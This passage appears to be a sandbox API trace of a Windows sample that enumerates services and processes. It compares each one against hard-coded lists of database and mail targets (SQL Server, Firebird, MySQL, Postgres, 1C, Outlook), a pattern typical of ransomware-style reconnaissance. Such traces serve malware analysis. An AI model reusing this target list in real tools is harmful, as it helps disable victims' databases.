InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xe90, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0273.021] CloseServiceHandle (hSCObject=0x47ea330) returned 1 [0273.021] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0273.021] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.021] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0273.021] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0273.021] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0273.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0273.022] lstrlenW (lpString="AudioSrv") returned 8 [0273.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0273.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0273.022] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0273.022] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0273.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0273.022] lstrlenW (lpString="BFE") returned 3 [0273.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0273.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0273.022] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0273.022] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0273.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0273.022] lstrlenW (lpString="CryptSvc") returned 8 [0273.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0273.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0273.022] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0273.022] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0273.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0273.022] lstrlenW (lpString="CscService") returned 10 [0273.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0273.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0273.022] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0273.022] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0273.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0273.022] lstrlenW (lpString="DcomLaunch") returned 10 [0273.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0273.022] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0273.022] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0273.022] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0273.022] lstrlenW (lpString="Dhcp") returned 4 [0273.022] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0273.022] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0273.023] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0273.023] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0273.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0273.023] lstrlenW (lpString="Dnscache") returned 8 [0273.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0273.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0273.023] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0273.023] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0273.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0273.023] lstrlenW (lpString="DPS") returned 3 [0273.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0273.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0273.023] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0273.023] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0273.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0273.023] lstrlenW (lpString="eventlog") returned 8 [0273.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0273.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0273.023] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0273.023] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0273.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0273.023] lstrlenW (lpString="EventSystem") returned 11 [0273.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0273.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0273.023] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0273.023] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0273.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0273.023] lstrlenW (lpString="gpsvc") returned 5 [0273.023] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0273.023] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0273.023] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0273.023] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0273.023] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0273.023] lstrlenW (lpString="iphlpsvc") returned 8 [0273.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0273.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0273.024] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0273.024] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0273.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0273.024] lstrlenW (lpString="LanmanServer") returned 12 [0273.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0273.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0273.024] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0273.024] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0273.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0273.024] lstrlenW (lpString="LanmanWorkstation") returned 17 [0273.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0273.024] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0273.024] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0273.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0273.024] lstrlenW (lpString="lmhosts") returned 7 [0273.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0273.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0273.024] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0273.024] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0273.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0273.024] lstrlenW (lpString="MMCSS") returned 5 [0273.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0273.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0273.024] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0273.024] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0273.024] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0273.024] lstrlenW (lpString="MpsSvc") returned 6 [0273.024] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0273.024] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0273.024] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0273.025] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0273.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0273.025] lstrlenW (lpString="NlaSvc") returned 6 [0273.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0273.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0273.025] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0273.025] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0273.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0273.025] lstrlenW (lpString="nsi") returned 3 [0273.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0273.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0273.025] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0273.025] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0273.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0273.025] lstrlenW (lpString="PcaSvc") returned 6 [0273.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0273.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0273.025] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0273.025] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0273.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0273.025] lstrlenW (lpString="PlugPlay") returned 8 [0273.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0273.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0273.025] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0273.025] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0273.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0273.025] lstrlenW (lpString="Power") returned 5 [0273.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0273.025] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0273.025] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0273.025] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0273.025] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0273.025] lstrlenW (lpString="ProfSvc") returned 7 [0273.025] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0273.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0273.026] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0273.026] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0273.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0273.026] lstrlenW (lpString="RpcEptMapper") returned 12 [0273.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0273.026] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0273.026] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0273.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0273.026] lstrlenW (lpString="RpcSs") returned 5 [0273.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0273.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0273.026] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0273.026] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0273.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0273.026] lstrlenW (lpString="SamSs") returned 5 [0273.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0273.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0273.026] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0273.026] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0273.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0273.026] lstrlenW (lpString="Schedule") returned 8 [0273.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0273.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0273.026] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0273.026] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0273.026] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0273.026] lstrlenW (lpString="SENS") returned 4 [0273.026] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0273.026] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0273.026] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0273.026] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0273.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0273.027] lstrlenW (lpString="ShellHWDetection") returned 16 [0273.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0273.027] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0273.027] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0273.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0273.027] lstrlenW (lpString="Spooler") returned 7 [0273.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0273.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0273.027] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0273.027] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0273.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0273.027] lstrlenW (lpString="SysMain") returned 7 [0273.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0273.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0273.027] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0273.027] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0273.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0273.027] lstrlenW (lpString="Themes") returned 6 [0273.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0273.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0273.027] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0273.027] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0273.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0273.027] lstrlenW (lpString="TrkWks") returned 6 [0273.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0273.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0273.027] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0273.027] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0273.027] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0273.027] lstrlenW (lpString="UxSms") returned 5 [0273.027] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0273.027] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0273.028] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0273.028] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0273.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0273.028] lstrlenW (lpString="Winmgmt") returned 7 [0273.028] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0273.028] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0273.028] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0273.028] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0273.028] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0273.028] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0273.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x210 [0273.029] Process32FirstW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0273.029] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0273.029] lstrlenW (lpString="System") returned 6 [0273.029] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0273.029] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0273.029] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0273.030] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0273.030] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0273.030] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0273.030] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0273.030] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0273.030] lstrlenW (lpString="smss.exe") returned 8 [0273.030] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0273.030] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.030] lstrlenW (lpString="csrss.exe") returned 9 [0273.030] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.030] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.030] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.030] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.030] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.031] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.031] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.031] lstrlenW (lpString="wininit.exe") returned 11 [0273.031] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0273.031] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0273.031] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0273.031] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0273.031] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0273.031] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0273.031] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0273.031] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.031] lstrlenW (lpString="csrss.exe") returned 9 [0273.032] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.032] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.032] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.032] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.032] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.032] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.032] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.032] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.032] lstrlenW (lpString="winlogon.exe") returned 12 [0273.032] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0273.032] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0273.032] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0273.032] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0273.032] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0273.032] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0273.032] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0273.032] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.033] lstrlenW (lpString="services.exe") returned 12 [0273.033] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0273.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0273.033] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0273.033] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0273.033] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0273.033] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0273.033] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0273.033] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.033] lstrlenW (lpString="lsass.exe") returned 9 [0273.033] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0273.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0273.033] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0273.033] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0273.033] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0273.033] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0273.033] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0273.033] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0273.033] lstrlenW (lpString="lsm.exe") returned 7 [0273.033] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0273.033] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0273.034] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0273.034] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0273.034] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0273.034] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0273.034] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0273.034] Process32NextW (in: hSnapshot=0x210, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.034] lstrlenW (lpString="svchost.exe") returned 11 [0273.034] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.034] lstrcmpiW (lpString1="1cv77.exe", 